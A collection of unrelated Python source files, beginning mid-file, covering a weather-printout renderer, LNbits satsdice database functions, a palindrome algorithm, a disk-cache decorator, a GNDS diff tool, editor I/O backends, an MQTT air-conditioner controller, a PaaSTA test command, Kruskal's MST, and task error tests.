weatherData['current']['condition']['text'], align="center", textSize=40))
imgArray.append(self.imText(u'%.1f\xb0' %
weatherData['current']['temp_c'], align="center", textSize=120))
# Wind speed + direction
mps = weatherData['current']['wind_kph']/3.6
imWindText = self.imText('%.1f m/s' % mps, align="left", textSize=40)
basedir=self.basedir + "artwork/weather/georg"
dayOrNight = [ "day" if weatherData['current']['is_day'] is 1 else "night"][0]
try:
filePath = "%s/%s/arrow.png" % (basedir,dayOrNight)
imArrow = Image.open(filePath,'r')
except Exception, e:
print(e)
raise
else:
imArrow = imArrow.rotate(weatherData['current']['wind_degree'], expand=True)
arrowWidth = 70
imArrow = imArrow.resize([arrowWidth,int(float(arrowWidth)/imArrow.size[0]*
imArrow.size[1])]).convert("1")
imWind = self.imBox(imWindText.size[0]+imArrow.size[0],
[ imArrow.size[1] if imArrow.size[1] > imArrow.size[0]
else imArrow.size[0]][0])
imWind.paste(imWindText,(0,0))
imWind.paste(imArrow,(imWindText.size[0]+10,0))
centeredImWind = self.imBox(self.printerConf['printerWidth'],imWind.size[1])
centeredImWind.paste(imWind,[(self.printerConf['printerWidth']-imWind.size[0])/2,0])
imgArray.append(centeredImWind)
imgArray.append(self.imText(
"%i%% rel. %.0f mPa temp. feels like %i\xb0" %
(weatherData['current']['humidity'], weatherData['current']['pressure_mb'],
weatherData['current']['feelslike_c']), align="center"))
imgArray.append(self.printLine())
imgMaster, height, imgData = self.combinePILObjects(imgArray)
return (height, imgData, [0 if not self.printerConf['rotate'] else 1][0], "image/png")
def weatherforecast(self, weatherData):
# Header: "Weather forecast", date etc.
imgArray = []
imgArray.append(self.imText('Weather forecast', align="center", textSize=60))
imgArray.append(self.imText("%s %s" %
(weatherData['current']['last_updated'],
weatherData['location']['name']) , align="center"))
imgArray.append(self.imBox(20,20)) # some blank space / "new line"
# The forecast in multiple columns
imgSuperArray = []
for day in weatherData['forecast']['forecastday']:
imArrayDay = []
# Weekday
#dayTxt = [ "Today" if day['date'] == datetime.now().isoformat().split('T')[0] else datetime.fromtimestamp(date['date_epoch']).strftime('%A')[0]
dayTxt = datetime.fromtimestamp(day['date_epoch']).strftime('%A')[:3]
imArrayDay.append(self.imText(dayTxt, align="center", textSize=140))
# Weather cloud
imCloud = self.weatherCloud(day, 'day', widthDiv=1)
imArrayDay.append(imCloud)
# Forecast text
# Blank spaces are added to ensure line break, if a text is too short to expand to at least two lines
forecastTxt = "{:<16}".format(day['day']['condition']['text'])
imArrayDay.append(self.imText(
forecastTxt, align="center", textSize=90))
# Temperature etc.
imArrayDay.append(self.imText(u'%.1f\xb0' %
day['day']['maxtemp_c'], align="center", textSize=180))
windSpeed = day['day']['maxwind_kph']/3.6
imArrayDay.append(self.imText(u'avg %.1f\xb0\nmin %.1f\xb0\nmax %.1f m/s' %
(day['day']['avgtemp_c'],day['day']['mintemp_c'],windSpeed), align="center", textSize=80))
# Append daily forecast to mulicolumn forecast
imgSuperArray.append(imArrayDay)
# Combine multicolumn forecast to one object
imgColumns, height, imgData = self.combinePILObjects(imgSuperArray, multiCol=True, doPrint=False)
# Append multicolumn forecast to what is to be printed
imgArray.append(imgColumns)
imgArray.append(self.printLine())
# Create the final image
imgMaster, height, imgData = self.combinePILObjects(imgArray)
return (height, imgData, [0 if not self.printerConf['rotate'] else 1][0], "image/png")
|
from datetime import datetime
from typing import List, Optional, Union
from lnbits.helpers import urlsafe_short_hash
from . import db
from .models import (
CreateSatsDiceLink,
CreateSatsDicePayment,
CreateSatsDiceWithdraw,
HashCheck,
satsdiceLink,
satsdicePayment,
satsdiceWithdraw,
)
async def create_satsdice_pay(wallet_id: str, data: CreateSatsDiceLink) -> satsdiceLink:
satsdice_id = urlsafe_short_hash()
await db.execute(
"""
INSERT INTO satsdice.satsdice_pay (
id,
wallet,
title,
base_url,
min_bet,
max_bet,
amount,
served_meta,
served_pr,
multiplier,
chance,
haircut,
open_time
)
VALUES (?, ?, ?, ?, ?, ?, 0, 0, 0, ?, ?, ?, ?)
""",
(
satsdice_id,
wallet_id,
data.title,
data.base_url,
data.min_bet,
data.max_bet,
data.multiplier,
data.chance,
data.haircut,
int(datetime.now().timestamp()),
),
)
link = await get_satsdice_pay(satsdice_id)
assert link, "Newly created link couldn't be retrieved"
return link
async def get_satsdice_pay(link_id: str) -> Optional[satsdiceLink]:
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_pay WHERE id = ?", (link_id,)
)
return satsdiceLink(**row) if row else None
async def get_satsdice_pays(wallet_ids: Union[str, List[str]]) -> List[satsdiceLink]:
if isinstance(wallet_ids, str):
wallet_ids = [wallet_ids]
q = ",".join(["?"] * len(wallet_ids))
rows = await db.fetchall(
f"""
SELECT * FROM satsdice.satsdice_pay WHERE wallet IN ({q})
ORDER BY id
""",
(*wallet_ids,),
)
return [satsdiceLink(**row) for row in rows]
async def update_satsdice_pay(link_id: int, **kwargs) -> Optional[satsdiceLink]:
q = ", ".join([f"{field[0]} = ?" for field in kwargs.items()])
await db.execute(
f"UPDATE satsdice.satsdice_pay SET {q} WHERE id = ?",
(*kwargs.values(), link_id),
)
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_pay WHERE id = ?", (link_id,)
)
return satsdiceLink(**row) if row else None
async def increment_satsdice_pay(link_id: int, **kwargs) -> Optional[satsdiceLink]:
q = ", ".join([f"{field[0]} = {field[0]} + ?" for field in kwargs.items()])
await db.execute(
f"UPDATE satsdice.satsdice_pay SET {q} WHERE id = ?",
(*kwargs.values(), link_id),
)
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_pay WHERE id = ?", (link_id,)
)
return satsdiceLink(**row) if row else None
async def delete_satsdice_pay(link_id: int) -> None:
await db.execute("DELETE FROM satsdice.satsdice_pay WHERE id = ?", (link_id,))
##################SATSDICE PAYMENT LINKS
async def create_satsdice_payment(data: CreateSatsDicePayment) -> satsdicePayment:
await db.execute(
"""
INSERT INTO satsdice.satsdice_payment (
payment_hash,
satsdice_pay,
value,
paid,
lost
)
VALUES (?, ?, ?, ?, ?)
""",
(data["payment_hash"], data["satsdice_pay"], data["value"], False, False),
)
payment = await get_satsdice_payment(data["payment_hash"])
assert payment, "Newly created withdraw couldn't be retrieved"
return payment
async def get_satsdice_payment(payment_hash: str) -> Optional[satsdicePayment]:
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_payment WHERE payment_hash = ?",
(payment_hash,),
)
return satsdicePayment(**row) if row else None
async def update_satsdice_payment(
payment_hash: int, **kwargs
) -> Optional[satsdicePayment]:
q = ", ".join([f"{field[0]} = ?" for field in kwargs.items()])
await db.execute(
f"UPDATE satsdice.satsdice_payment SET {q} WHERE payment_hash = ?",
(bool(*kwargs.values()), payment_hash),
)
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_payment WHERE payment_hash = ?",
(payment_hash,),
)
return satsdicePayment(**row) if row else None
##################SATSDICE WITHDRAW LINKS
async def create_satsdice_withdraw(data: CreateSatsDiceWithdraw) -> satsdiceWithdraw:
await db.execute(
"""
INSERT INTO satsdice.satsdice_withdraw (
id,
satsdice_pay,
value,
unique_hash,
k1,
open_time,
used
)
VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(
data["payment_hash"],
data["satsdice_pay"],
data["value"],
urlsafe_short_hash(),
urlsafe_short_hash(),
int(datetime.now().timestamp()),
data["used"],
),
)
withdraw = await get_satsdice_withdraw(data["payment_hash"], 0)
assert withdraw, "Newly created withdraw couldn't be retrieved"
return withdraw
async def get_satsdice_withdraw(withdraw_id: str, num=0) -> Optional[satsdiceWithdraw]:
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_withdraw WHERE id = ?", (withdraw_id,)
)
if not row:
return None
withdraw = []
for item in row:
withdraw.append(item)
withdraw.append(num)
return satsdiceWithdraw(**row)
async def get_satsdice_withdraw_by_hash(
unique_hash: str, num=0
) -> Optional[satsdiceWithdraw]:
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_withdraw WHERE unique_hash = ?", (unique_hash,)
)
if not row:
return None
withdraw = []
for item in row:
withdraw.append(item)
withdraw.append(num)
return satsdiceWithdraw(**row)
async def get_satsdice_withdraws(
wallet_ids: Union[str, List[str]]
) -> List[satsdiceWithdraw]:
if isinstance(wallet_ids, str):
wallet_ids = [wallet_ids]
q = ",".join(["?"] * len(wallet_ids))
rows = await db.fetchall(
f"SELECT * FROM satsdice.satsdice_withdraw WHERE wallet IN ({q})",
(*wallet_ids,),
)
return [satsdiceWithdraw(**row) for row in rows]
async def update_satsdice_withdraw(
withdraw_id: str, **kwargs
) -> Optional[satsdiceWithdraw]:
q = ", ".join([f"{field[0]} = ?" for field in kwargs.items()])
await db.execute(
f"UPDATE satsdice.satsdice_withdraw SET {q} WHERE id = ?",
(*kwargs.values(), withdraw_id),
)
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_withdraw WHERE id = ?", (withdraw_id,)
)
return satsdiceWithdraw(**row) if row else None
async def delete_satsdice_withdraw(withdraw_id: str) -> None:
await db.execute(
"DELETE FROM satsdice.satsdice_withdraw WHERE id = ?", (withdraw_id,)
)
async def create_withdraw_hash_check(the_hash: str, lnurl_id: str) -> HashCheck:
await db.execute(
"""
INSERT INTO satsdice.hash_checkw (
id,
lnurl_id
)
VALUES (?, ?)
""",
(the_hash, lnurl_id),
)
hashCheck = await get_withdraw_hash_checkw(the_hash, lnurl_id)
return hashCheck
async def get_withdraw_hash_checkw(the_hash: str, lnurl_id: str) -> Optional[HashCheck]:
rowid = await db.fetchone(
"SELECT * FROM satsdice.hash_checkw WHERE id = ?", (the_hash,)
)
rowlnurl = await db.fetchone(
"SELECT * FROM satsdice.hash_checkw WHERE lnurl_id = ?", (lnurl_id,)
)
if not rowlnurl:
await create_withdraw_hash_check(the_hash, lnurl_id)
return {"lnurl": True, "hash": False}
else:
if not rowid:
await create_withdraw_hash_check(the_hash, lnurl_id)
return {"lnurl": True, "hash": False}
else:
return {"lnurl": True, "hash": True}
|
def LPSubstr(s):
n = len(s)
p = [[0] * (n + 1), [0] * n]
for z, p_z in enumerate(p):
left, right = 0, 0
for i in range(n):
t = right - i + 1 - z
if i < right:
p_z[i] = min(t, p_z[left + t])
L, R = i - p_z[i], i + p_z[i] - 1 + z
while (L >= 1) and (R + 1 < n) and (s[L - 1] == s[R + 1]):
p_z[i] += 1
L -= 1
R += 1
if R > right:
left, right = L, R
i1, x1 = max(enumerate(p[0]), key=lambda x: x[1])
i2, x2 = max(enumerate(p[1]), key=lambda x: x[1])
return s[i1 - x1:i1 + x1], s[i2 - x2:i2 + x2 + 1]
|
import os
import pickle
import time
from functools import wraps
from threading import Thread, Lock
from typing import Dict, List
from .logging_utils import logger
decorator_with_args = lambda d: lambda *args, **kwargs: lambda func: wraps(func)(
d(func, *args, **kwargs)
)
def write_to_file(cache, f_name, lock, index, it_is_too_late, sleep_time):
log_prefix = f"t{index} for {f_name}:"
logger.debug(f"{log_prefix} sleeping for {sleep_time}")
time.sleep(sleep_time)
if not it_is_too_late[index] and not lock.locked():
with lock:
with open(f_name, "wb") as f:
pickle.dump(cache, f)
logger.debug(f"{log_prefix} written to file")
else:
logger.debug(f"{log_prefix} too late or lock taken")
@decorator_with_args
def disk_cache(function, directory=".", sleep_time=2.5):
lock: Dict[str, Lock] = {}
cache: Dict[str, dict] = {}
cache_miss: Dict[str, bool] = {}
it_is_too_late: Dict[str, List[bool]] = {}
i: Dict[str, int] = {}
@wraps(function)
def wrapper(*args, **kwargs):
fu_name = function.__name__
fi_name = os.path.join(directory, f"{fu_name}.cache")
lock[fu_name] = lock.get(fu_name, Lock())
cache[fu_name] = cache.get(fu_name, {})
cache_miss[fu_name] = cache_miss.get(fu_name, {})
it_is_too_late[fu_name] = it_is_too_late.get(fu_name, [])
i[fu_name] = i.get(fu_name, 0)
if len(cache[fu_name]) == 0 and os.path.isfile(fi_name):
with open(fi_name, "rb") as f:
cache[fu_name] = pickle.load(f)
key = (
args,
tuple(sorted(kwargs.items(), key=lambda x: hash(x))),
)
if key not in cache[fu_name]:
logger.debug(f"cache miss for {fu_name}")
cache[fu_name][key] = function(*args, **kwargs)
cache_miss[fu_name] = True
if cache_miss[fu_name]:
if i[fu_name] > 0:
it_is_too_late[fu_name][-1] = True
it_is_too_late[fu_name].append(False)
Thread(
target=write_to_file,
args=(
cache[fu_name],
fi_name,
lock[fu_name],
i[fu_name],
it_is_too_late[fu_name],
sleep_time,
),
).start()
cache_miss[fu_name] = False
i[fu_name] += 1
return cache[fu_name][key]
return wrapper
if __name__ == "__main__":
pass
|
#! /usr/bin/env python3
# <<BEGIN-copyright>>
# Copyright 2021, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
# <<END-copyright>>
description = """Diffs two GNDS files. Prints the diff information to the terminal.
Converts the energy unit of the second GNDS file to the first GNDS file if needed.
The GNDS files must be formatted in the same GNDS format version or a raise will be executed."""
__doc__ = description
import os
from argparse import ArgumentParser
from fudge import reactionSuite as reactionSuiteModule
parser = ArgumentParser( description = description )
parser.add_argument( "GNDSFile1", help = "The name of the first GNDS file." )
parser.add_argument( "GNDSFile2", help = "The name of the second GNDS file." )
args = parser.parse_args( )
protare1 = reactionSuiteModule.readXML( args.GNDSFile1 )
protare2 = reactionSuiteModule.readXML( args.GNDSFile2 )
if( protare1.format != protare2.format ) : raise Exception( 'GNDS formats not the same: "%s" vs. "%s".' % ( protare1.format, protare2.format ) )
if( protare1.domainUnit != protare2.domainUnit ) : protare2.convertUnits( { protare2.domainUnit : protare1.domainUnit } )
print( "FILE1: %s" % os.path.realpath( args.GNDSFile1 ) )
print( "FILE2: %s" % os.path.realpath( args.GNDSFile2 ) )
print( protare1.diff( protare2 ) )
|
import pathlib
import gzip
import os
import six
from .base import EditorIO
__all__ = (
'FileIO',
'GZipFileIO',
'DirectoryIO',
# 'HttpIO',
)
ENCODINGS = ['utf-8', 'latin-1']
class FileIO(EditorIO):
"""
I/O backend for the native file system.
"""
def can_open_location(cls, location: pathlib.Path):
# We can handle all local files.
return location.is_file()
def exists(self, location: pathlib.Path):
return location.is_file()
def read(self, location: pathlib.Path):
"""
Read file from disk.
"""
# Try to open this file, using different encodings.
for e in ENCODINGS:
try:
with location.open('r') as f:
return f.read(), e
except UnicodeDecodeError:
pass # Try next codec.
# Unable to open.
raise Exception('Unable to open file: %r' % location)
def write(self, location: pathlib.Path, text, encoding):
"""
Write file to disk.
"""
with location.open('w', encoding=encoding) as f:
f.write(text)
class GZipFileIO(EditorIO):
"""
I/O backend for gzip files.
It is possible to edit this file as if it were not compressed.
The read and write call will decompress and compress transparently.
"""
def can_open_location(cls, location):
return FileIO().can_open_location(location) and location.suffix == '.gz'
def exists(self, location):
return FileIO().exists(location)
def read(self, location):
location = os.path.expanduser(location)
with gzip.open(location, 'rb') as f:
data = f.read()
return _auto_decode(data)
def write(self, location, text, encoding):
"""
Write file to disk.
"""
location = os.path.expanduser(location)
with gzip.open(location, 'wb') as f:
f.write(text.encode(encoding))
class DirectoryIO(EditorIO):
"""
Create a textual listing of the directory content.
"""
def can_open_location(cls, location: pathlib.Path):
# We can handle all local directories.
return location.is_dir()
def exists(self, location: pathlib.Path):
return location.is_dir()
def read(self, directory):
# Read content.
content = sorted(os.listdir(directory))
directories = []
files = []
for f in content:
if os.path.isdir(os.path.join(directory, f)):
directories.append(f)
else:
files.append(f)
# Construct output.
result = []
result.append('" ==================================\n')
result.append('" Directory Listing\n')
result.append('" %s\n' % os.path.abspath(directory))
result.append('" Quick help: -: go up dir\n')
result.append('" ==================================\n')
result.append('../\n')
result.append('./\n')
for d in directories:
result.append('%s/\n' % d)
for f in files:
result.append('%s\n' % f)
return ''.join(result), 'utf-8'
def write(self, location, text, encoding):
raise NotImplementedError('Cannot write to directory.')
def isdir(self, location):
return True
# class HttpIO(EditorIO):
# """
# I/O backend that reads from HTTP.
# """
# def can_open_location(cls, location):
# # We can handle all local directories.
# return location.startswith('http://') or location.startswith('https://')
# def exists(self, location):
# return NotImplemented # We don't know.
# def read(self, location):
# # Do Http request.
# bytes = urllib.request.urlopen(location).read()
# # Return decoded.
# return _auto_decode(bytes)
# def write(self, location, text, encoding):
# raise NotImplementedError('Cannot write to HTTP.')
def _auto_decode(data):
"""
Decode bytes. Return a (text, encoding) tuple.
"""
assert isinstance(data, six.binary_type)
for e in ENCODINGS:
try:
return data.decode(e), e
except UnicodeDecodeError:
pass
return data.decode('utf-8', 'ignore')
|
import paho.mqtt.client as mqtt #import the client1
import time
def on_data(topic,message):
print(topic, message)
# This is a helper class responsible for controlling A/C.
# We can adjust all settings or single setting at one time.
class AC:
def __init__(self, topic, IP):
print("Connecting to PI...")
self.topic = topic
self.broker = IP
self.client = mqtt.Client("P1") #create new instance
# self.client.on_message=self.on_message #attach function to callback
self.client.connect(self.broker) #connect to broker
print("Connected to PI successfully.")
# This is the message format to be sent to A/C
def create_config_string(self, id = "-", mode = "-", fan = "-", temp = "-", power = "-" ):
return str(id) + "," + str(mode) + "," + str(fan) + "," + str(temp) + "," + str(power)
def start(self):
self.client.loop_forever() #start the loop
def set_fan_speed(self, id, speed):
if speed == "HIGH" or speed == "MEDIUM" or speed == "LOW":
#print(self.create_config_string(id = id, fan = speed))
self.client.publish("Astair/MODEL/AC",self.create_config_string(id = id, fan = speed))
else :
print("Invalid fan speed. (LOW, MEDIUM, HIGH)")
def power_on(self, id):
print(self.create_config_string(id = id, power = "ON"))
self.client.publish("Astair/MODEL/AC",self.create_config_string(id = id, power = "ON"))
def power_off(self, id):
#print(self.create_config_string(id = id, power = "0"))
self.client.publish("Astair/MODEL/AC",self.create_config_string(id = id, power = "OFF"))
def set_temp(self, id, temp):
if 16 <= temp and temp <= 30:
print(self.create_config_string(id=id, temp=temp))
self.client.publish("Astair/MODEL/AC", self.create_config_string(id = id, temp = temp))
print("AC is set to ", temp)
else:
print("Invalid temperature value. (16-30)")
def set_mode(self, id, mode):
#print( self.create_config_string(id = id, mode = mode))
if mode == "COOL" or mode == "FAN" or mode == "DRY" or mode == "HEAT" or mode == "AUTO":
self.client.publish("Astair/MODEL/AC", self.create_config_string(id = id, mode = mode))
else:
print("Invalid mode. (COOL, FAN, DRY, HEAT, AUTO)")
def set_all(self, id, mode = "-", speed = "-", temp = "-", power = "-"):
if not (mode == "-" or mode == "COOL" or mode == "FAN" or mode == "DRY" or mode == "HEAT" or mode == "AUTO"):
print("Invalid mode. (COOL, FAN, DRY, HEAT, AUTO)")
elif not (temp == "-" or (16 <= temp and temp <= 30)):
print("Invalid temperature value. (16-30)")
elif not (power == "-" or power == "ON" or power == "OFF"):
print("Invalid power value. (ON-OFF)")
elif not (speed == "-" or speed == "LOW" or speed == "MEDIUM" or speed == "HIGH"):
print("Invalid fan speed. (LOW, MEDIUM, HIGH)")
else:
#print(self.create_config_string(id = id, mode = mode, fan = speed, temp = temp, power = power))
self.client.publish("Astair/MODEL/AC",self.create_config_string(id = id, mode = mode, fan = speed, temp = temp, power = power))
# def test(self):
# self.client.publish("Astair/MODEL/AC", "1,COOL,HIGH,19,OFF")
|
#!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from paasta_tools.cli.utils import get_jenkins_build_output_url
from paasta_tools.cli.utils import lazy_choices_completer
from paasta_tools.cli.utils import validate_service_name
from paasta_tools.utils import _log
from paasta_tools.utils import _run
from paasta_tools.utils import build_docker_tag
from paasta_tools.utils import check_docker_image
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import list_services
def add_subparser(subparsers):
list_parser = subparsers.add_parser(
"itest",
help="Runs 'make itest' as part of the PaaSTA contract.",
description=(
"'paasta itest' runs 'make itest' in the root of a service directory. "
"It is designed to be used in conjunction with the 'Jenkins' workflow: "
"http://paasta.readthedocs.io/en/latest/about/contract.html#jenkins-pipeline-recommended"
),
)
list_parser.add_argument(
"-s",
"--service",
help="Test and build docker image for this service. Leading "
'"services-", as included in a Jenkins job name, '
"will be stripped.",
required=True,
)
list_parser.add_argument(
"-c",
"--commit",
help="Git sha used to construct tag for built image",
required=True,
)
list_parser.add_argument(
"-d",
"--soa-dir",
dest="soa_dir",
help="A directory from which soa-configs should be read from",
default=DEFAULT_SOA_DIR,
).completer = lazy_choices_completer(list_services)
list_parser.add_argument(
"--timeout",
dest="timeout",
help="How many seconds before this command times out",
default=3600,
)
list_parser.set_defaults(command=paasta_itest)
def paasta_itest(args):
"""Build and test a docker image"""
service = args.service
soa_dir = args.soa_dir
if service and service.startswith("services-"):
service = service.split("services-", 1)[1]
validate_service_name(service, soa_dir=soa_dir)
tag = build_docker_tag(service, args.commit)
run_env = os.environ.copy()
run_env["DOCKER_TAG"] = tag
cmd = "make itest"
loglines = []
_log(
service=service,
line="starting itest for %s." % args.commit,
component="build",
level="event",
)
returncode, output = _run(
cmd,
env=run_env,
timeout=args.timeout,
log=True,
component="build",
service=service,
loglevel="debug",
)
if returncode != 0:
loglines.append("ERROR: itest failed for %s." % args.commit)
output = get_jenkins_build_output_url()
if output:
loglines.append("See output: %s" % output)
else:
loglines.append("itest passed for %s." % args.commit)
if not check_docker_image(service, args.commit):
loglines.append("ERROR: itest has not created %s" % tag)
returncode = 1
for logline in loglines:
_log(service=service, line=logline, component="build", level="event")
return returncode
|
from collections import defaultdict
## Graph Representation for edge with weight
class Graph:
def __init__(self, vertices):
self.V = vertices # No. of vertices
self.graph = [] # default dictionary
# to store graph
# function to add an edge to graph
def addEdge(self, u, v, w):
self.graph.append([u, v, w])
# A utility function to find set of an element i
# (uses path compression technique)
def find(self, parent, i):
if parent[i] == i:
return i
return self.find(parent, parent[i])
# A function that does union of two sets of x and y
# (uses union by rank)
def union(self, parent, rank, x, y):
xroot = self.find(parent, x)
yroot = self.find(parent, y)
# Attach smaller rank tree under root of
# high rank tree (Union by Rank)
if rank[xroot] < rank[yroot]:
parent[xroot] = yroot
elif rank[xroot] > rank[yroot]:
parent[yroot] = xroot
# If ranks are same, then make one as root
# and increment its rank by one
else:
parent[yroot] = xroot
rank[xroot] += 1
# Function to calculate MST using Kruskal's algorithm
def KruskalMST(self):
result = [] # This will store the resultant MST
i = 0 # An index variable, used for sorted edges
e = 0 # An index variable, used for result[]
# Step 1: Sort all the edges in non-decreasing
# order of their weight. If we are not allowed to change the
# given graph, we can create a copy of graph
self.graph = sorted(self.graph, key=lambda item: item[2])
parent = [];
rank = []
# Create V subsets with single elements
for node in range(self.V):
parent.append(node)
rank.append(0)
# Number of edges to be taken is equal to V-1
while e < self.V - 1:
# Step 2: Pick the smallest edge and increment
# the index for next iteration
u, v, w = self.graph[i]
i = i + 1
x = self.find(parent, u)
y = self.find(parent, v)
# If including this edge does't cause cycle,
# include it in result and increment the index
# of result for next edge
if x != y:
e = e + 1
result.append([u, v, w])
self.union(parent, rank, x, y)
# Else discard the edge
return result
# Class to construct graph with result from MST and use DFS for traversal
class Graph2:
# Constructor
def __init__(self):
# default dictionary to store graph
self.graph = defaultdict(list)
# function to add an edge to graph
def addEdge(self, u, v, w):
self.graph[u].append(v)
self.graph[v].append(u)
# A function used by DFS
def DFSUtil(self, v, visited, out):
# print(out)
# Mark the current node as visited and print it
visited[v] = True
# print(v)
out.append(v)
# Recur for all the vertices adjacent to this vertex
for i in self.graph[v]:
if visited[i] == False:
self.DFSUtil(i, visited, out)
# The function to do DFS traversal. It uses
# recursive DFSUtil()
def DFS(self, v):
out = []
# Mark all the vertices as not visited
visited = [False] * (len(self.graph) + 1)
# Call the recursive helper function to print
# DFS traversal
self.DFSUtil(v, visited, out)
return out
if __name__ == '__main__':
# Construct graph with weight and compute MST
g = Graph(9)
g.addEdge(0, 1, 4)
g.addEdge(0, 7, 8)
g.addEdge(1, 2, 8)
g.addEdge(1, 7, 11)
g.addEdge(2, 3, 7)
g.addEdge(2, 8, 2)
g.addEdge(2, 5, 4)
g.addEdge(3, 4, 9)
g.addEdge(3, 5, 14)
g.addEdge(4, 5, 10)
g.addEdge(5, 6, 2)
g.addEdge(6, 7, 1)
g.addEdge(6, 8, 6)
g.addEdge(7, 8, 7)
print("Original Graph with Weight: ", g.graph)
# MST
MST = KruskalMST(g)
print("MST: ", MST)
g2 = Graph2()
for i in MST:
g2.addEdge(i[0], i[1], i[2])
# print(g2.graph)
# print(g2.graph)
traversal = g2.DFS(2)
print("Source: 2, "+"DFS Traversal: ", traversal)
|
from octopus.modules.es.testindex import ESTestCase
from service import models
import os, shutil
from service.tests import fixtures
from redis import Redis
from octopus.core import app
from service.tasks import ethesis_deposit, purge_tasks, ethesis_poll, dataset_deposit, dataset_poll
from service import deposit
from service.lib.crud_helper import CrudHelper
from service.lib import zendesk_tickets
def mock_deposit_none(*args, **kwargs):
return None
def mock_deposit_raise(*args, **kwargs):
raise RuntimeError("An error")
def mock_create_ticket_false(*args, **kwargs):
return False
def mock_create_ticket_raise(*args, **kwargs):
raise RuntimeError("An error")
def mock_poll(*args, **kwargs):
raise RuntimeError("An error")
class TestModels(ESTestCase):
def setUp(self):
super(TestModels, self).setUp()
self.old_deposit = deposit.deposit
self.old_et_create = zendesk_tickets.ZendeskTickets.create_ethesis_ticket
self.old_poll = deposit.poll
if os.path.exists("tmp"):
shutil.rmtree("tmp")
def tearDown(self):
super(TestModels, self).tearDown()
deposit.deposit = self.old_deposit
deposit.poll = self.old_poll
zendesk_tickets.ZendeskTickets.create_ethesis_ticket = self.old_et_create
def test_01_thesis_error_none(self):
deposit.deposit = mock_deposit_none
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_deposit._do_deposit(r, job_id)
def test_02_thesis_error_raise(self):
deposit.deposit = mock_deposit_raise
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_deposit._do_deposit(r, job_id)
def test_03_thesis_purge(self):
deposit.deposit = mock_deposit_none
# get our fixtures
THESIS = fixtures.ThesisFixtureFactory.thesis()
source_file = fixtures.ThesisFixtureFactory.pdf_path()
# make an instance of the ethesis object
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
# copy in our test file
os.makedirs(et.dir)
shutil.copy(source_file, et.dir)
ch = CrudHelper("ethesis", job_id)
ch.submit_record()
pt = purge_tasks.PurgeTasks("ethesis")
pt.job(job_id)
def test_04_thesis_zendesk_error_false(self):
zendesk_tickets.ZendeskTickets.create_ethesis_ticket = mock_create_ticket_false
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_deposit._do_ticket(r, job_id)
def test_05_thesis_zendesk_error_raise(self):
zendesk_tickets.ZendeskTickets.create_ethesis_ticket = mock_create_ticket_raise
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_deposit._do_ticket(r, job_id)
def test_06_thesis_poll_error_raise(self):
deposit.poll = mock_poll
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
THESIS["edit_iri"] = "http://whatever/"
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_poll._do_poll(r, job_id)
def test_07_data_error_none(self):
deposit.deposit = mock_deposit_none
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_deposit._do_deposit(r, job_id)
def test_08_data_error_raise(self):
deposit.deposit = mock_deposit_raise
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_deposit._do_deposit(r, job_id)
def test_09_data_purge(self):
deposit.deposit = mock_deposit_none
# get our fixtures
DATASET = fixtures.DatasetFixtureFactory.dataset()
source_file = fixtures.DatasetFixtureFactory.pdf_path()
# make an instance of the ethesis object
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
# copy in our test file
os.makedirs(ds.dir)
shutil.copy(source_file, ds.dir)
ch = CrudHelper("dataset", job_id)
ch.submit_record()
pt = purge_tasks.PurgeTasks("dataset")
pt.job(job_id)
def test_10_data_zendesk_error_false(self):
zendesk_tickets.ZendeskTickets.create_dataset_ticket = mock_create_ticket_false
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_deposit._do_ticket(r, job_id)
def test_11_data_zendesk_error_raise(self):
zendesk_tickets.ZendeskTickets.create_dataset_ticket = mock_create_ticket_raise
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_deposit._do_ticket(r, job_id)
def test_12_data_poll_error_raise(self):
deposit.poll = mock_poll
